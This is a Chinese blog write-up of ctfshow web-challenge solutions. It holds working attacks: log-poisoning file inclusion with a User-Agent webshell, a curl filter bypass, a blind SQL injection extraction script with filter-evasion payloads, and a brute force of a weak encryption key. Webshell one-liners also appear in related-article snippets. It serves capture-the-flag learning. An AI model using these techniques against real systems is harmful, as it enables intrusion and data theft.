ctfshow_web_AK赛

最新推荐文章于 2024-05-15 13:10:51 发布
最新推荐文章于 2024-05-15 13:10:51 发布
阅读量411 收藏
点赞数
分类专栏: # web 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62422842/article/details/125180325
版权

日常刷题,在此记录一下

签到_观己

看题目代码

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match('/php/i', $file)){
        die('error');
    }else{
        include($file);
    }

}else{
    highlight_file(__FILE__);
}

?>

看到include肯定都会想到使用伪协议啊啥的读取flag文件。但是这里过滤掉了php大小写关键字,所以伪协议在这就不能用了。我们还可以利用日志包含。抓包可以发现是nginx的服务器。

而nginx的日志路径为/var/log/nginx/access.log(小知识点)。通过这个路径我们可以访问到它的日志内容。

可以发现,日志中有访问的地址和UA的信息,那么我们就可以把木马写在UA头里,并记录在日志里面。

然后 访问日志  发现输出有666,则说明木马已经被传进去了。

接着通过蚁剑连接,在根目录下找到flag。

web1_观字 

打开题目直接给了源码。

<?php

#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
    $url = $_GET['url'];
    $protocol = substr($url, 0,7);
    if($protocol!='http://'){
        die('仅限http协议访问');
    }
    if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
        die('仅限域名地址访问');
    }
    system('curl '.$url);
}

flag告诉我们了,在这个链接里面。最关键的就是要绕过正则的限制。可以看出点被过滤了,在curl命令下,句号是可以代替点的,并且句号没有被过滤,所以payload

?url=http://192。168。7。68/flag

成功得出flag。

这里过滤了0,没有过滤0的情况下,我们还可以转十进制访问。

web2_观星

打开题目是三篇文章。利用点就是参数id可以进行sql注入。过滤了很多东西,我们可以用fuzz测试过滤了哪些东西。

524长度的全部都是被过滤掉的,主要过滤了(union,like,=,’,空格,and,if,逗号,ascii,sleep)等(在进行fuzz测试的时候,线程不能调太高 ,会出现500) 测试发现在id参数可以进行运算。(数字型)

 那就可以用布尔盲注。常用的布尔盲注payload为1^if(ascii(substr('flag',1,1))=104,1,0) 题目中过滤了if。那么我们可以用另一种语句case(A)when(B)then(C)else(D)end,意思大概就是A如果等于B那就返回C否则返回D。

过滤了空格可以用()代替
过滤了逗号可以用from..for代替
过滤了and可以用^或or来代替
过滤了ascli可以用 ord代替
过滤了等号和like可以用regexp代替

总结下来能用的payload是

id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end

该id运算好有两种情况,id=1^2和id=1^3。我们需要知道id=1^2的查询结果,测试一下发现为第三篇文章。

 我们记录关键信息I asked nothing就可以编写脚本了。

附上脚本

import requests
url = "http://e576e0ce-3634-40b4-a9b9-d97a15b78d37.challenge.ctf.show/index.php?id=1^"
flag = ""
for i in range(1,50):   #库名表名字段名以及flag的长度
    print("i="+str(i))
    for j in range(38,126):      # 可打印字符
        #payload = "case(ord(substr(database()from({})for(1))))when({})then(2)else(3)end".format(i,j)  #爆库
        #payload = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({})for(1))))when({})then(2)else(3)end".format(i,j) #爆表
        #payload = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({})for(1))))when({})then(2)else(3)end".format(i,j) # 爆字段
        payload = "case(ord(substr((select(group_concat(flag))from(flag))from({})for(1))))when({})then(2)else(3)end".format(i,j) #爆flag
        a = url+payload
        r = requests.get(a).text  #获取响应包信息
        if "I asked nothing" in r:
            flag+=chr(j)
            print(flag)
            break

成功跑出flag。

web3_观图 

打开题目查看源代码,发现一个可疑的地方,这个很像base64,但是解码为乱码。

 但是访问这个showImage.php就能得到源码了。

 <?php

//$key = substr(md5('ctfshow'.rand()),3,8);
//flag in config.php
include('config.php');
if(isset($_GET['image'])){
    $image=$_GET['image'];
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(file_exists($str)){
        header('content-type:image/gif');
        echo file_get_contents($str);
    }
}else{
    highlight_file(__FILE__);
}
?>

注释中告诉了你flag的位置和key的生成。代码本身就解释了那一段像base的密码的由来。目前的关键点就是key中有rand()函数,在php语言中,rand()函数的最大值是32768,那么我们就可以用php爆破出它的随机数。

<?php
for ($i=0; $i <= 32768; $i++) { 
	$key = substr(md5('ctfshow'.$i),3,8);
	$image="Z6Ilu83MIDw=";
	$str = openssl_decrypt($image, 'bf-ecb', $key);
	if($str!=''){
		echo $str;echo "<br>";
	}
}
?>

在诸多乱码中找到一个很像的。访问确实是那张图片。

 再写编程求随机数了。

<?php
for ($i=0; $i <= 32768; $i++) { 
	$key = substr(md5('ctfshow'.$i),3,8);
	$image="Z6Ilu83MIDw=";
	$str = openssl_decrypt($image, 'bf-ecb', $key);
	if($str=='1.jpg'){
		echo $i;
	}
}
?>

得出来随机数是27347,那么就直接对config.php加密就行了。

<?php
$key = substr(md5('ctfshow'.'27347'),3,8); 
$str = openssl_encrypt("config.php","bf-ecb",$key);
echo $str;
?>

加密得到N6bf8Bd8jm0SpmTZGl0isw==。再通过image传参,会发现图片无法显示,ctrl+s保存为php后缀的文件查看就是flag。

结语

还有最后一个题知识面没有涉及到,所以就没有复现。

XiLitter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ak.rar_web development_网页
09-20
开发网页 跳转编写Java程序访问并显示数据库中的用户的信息
ctfshow WEB AK
LYJ20010728的博客
06-14 4560
WEB AK签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload 签到_观己 考点 文件包含 思路 盲猜一波flag在根目录下,所以直接读取试试 Payload 源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){
[CTFSHOW]WEBAK
Y4tacker的博客
11-01 3397
文章目录签到_观己web1_观字参考文章 前言:希望自己能一天天逐渐的改变 签到_观己 首先我尝试了一波data伪协议发现被禁止了,想了半天结果忘记了日志包含了害file=/var/log/nginx/access.log 尝试在UA中放入一句话木马 芜湖,起飞! system("ls /"); 结束 web1_观字 代码审计,题目的意思是想我们通过curl http://192.168.7.68/flag的回显得到flag,但是.被过滤了,然后我想到了把ip转换为数字,192.168.1.100
ctfshow(WEB AK)
m0_72125469的博客
03-11 948
ctfshow webAK web观己 web观字 web观星 web观图 web观心
ctfshow-WEB_AK
qq_44657899的博客
08-01 5161
签到_观己(日志包含) 文件包含一般下面几种协议,不过这些协议这道题都用不起: 除了猜,还有日志包含。 首先访问file=/var/log/nginx/access.log看日志文件是否存在。 然后访问aaaaaaaaaaa,再查看日志文件,已经被记录到了日志文件中。 因为url中会被编码,所以在UA中加入一句话木马<?php @eval($_GET['pass']);?>,成功写入日志。 随后蚁剑链接:http://0bb8f2b6-74cb-4fd9-860d-a4d246c8aa1
ctfshow webAK
qq_45655564的博客
09-01 271
签到_观己 web1_观字 web2_观星 点击不同的链接上方的url处id会有变化,所以可能是SQL注入 于是试了几下,令id2/2发现是id=1的界面,可以确定是数字型注入,然后又发现它过滤了一些东西 所以,就fuzz了一下,发现主要困难在于过滤了逗号,like,等于号。所以我们只好盲注了。 首先爆数据库 0^(length(database())regexp(4)) 可以知到数据库长度是4 然后 0^(substr(database()from/**/1/**/for/**/1)regexp()
CTFSHOW web_AK
yao_xin_de_yuan的博客
07-31 420
CTFSHOW web_AK 签到——观己 文件包含漏洞 php伪协议 看源码过滤了php,开始想的是php伪协议,但是试了一下allow_url_include=off,data://用不了。最后尝试了一下直接读/flag,/flag.txt。发现在/flag.txt直接读出了flag. 日志包含 传?file=/var/log/nginx/access.log过去发现nginx访问日志可以访问。 写一句话<? eval($_POST['hack']);?>到UA里面,go。 使用蚁剑
ak4113.rar_AK4113_The Wire
07-13
Routines for control of the AK4113 via I2C 4-wire serial interface.
Epson_sp1390_6.1aK_x32
12-09
Epson_sp1390_6.1aK_x32
LCD_YeJing.zip_1_Write On_wave3ak
09-23
Based on the VHDL LCD code, you can download it yourself if you need it. If the file cannot be opened, please write to me!
ADSP_BF533_ak4556
07-01
ADSP_BF533驱动AK4556发生和采集两路音频信号
WEB AK
记录学习,一起进步
05-19 778
【ctfshow】WEB AK
ctfshow-WEB AK-web1_观字
博客地址 www.sec0nd.top
02-25 432
ctfshow-WEB AK-web1_观字 WP
ctfshow-WEB AK-签到_观己
博客地址 www.sec0nd.top
02-25 2470
文章目录题目分析解题过程 题目分析 打开网页 正则匹配过滤了php,且大小写不敏感 allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题 解题过程 ?file=/var/log/nginx/access.log 发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话 在UA中添加一句话木马 <?php eval($_POST[1]);?> 在POST中令1=system('ls /');查看根目录中的文件 发现有个flag.txt 这里应该就是fl
ctfshow-AK
blowed的博客
04-16 2904
ctfshow AK
CTFSHOW WEB_AK
羽的博客
07-31 3004
签到_观己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
WEB_AK-ctf.show平台
~airrudder~
07-31 713
本篇内容 签到_观己 web1_观字 web2_观星 web3_观图 web4_观心 上一篇 | 目录 | 下一篇 签到_观己 访问得到源码: <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file); } }else{ highli.
[WEB_AK]观己
車鈊的博客
08-15 317
观察: 访问实例,可以看到一串PHP代码,这是一道PHP审计题。 主网址: http://98f0a5bb-0d07-4b2f-9b81-2aa83de8b76a.chall.ctf.show/ 源码: <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($fil
如何同步管理1000个设备的VLAN数据?
最新发布
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
ctfshow web web ak观心
09-11
CTFShow的Web AK中,观心考点的payload可以参考以下内容。引用[1]提供了一系列关于Web AK观心考点的思路payload。引用中给出了一个源码示例,其中对传入的文件参数进行了校验。如果传入的文件名中包含"php"这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XiLitter

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值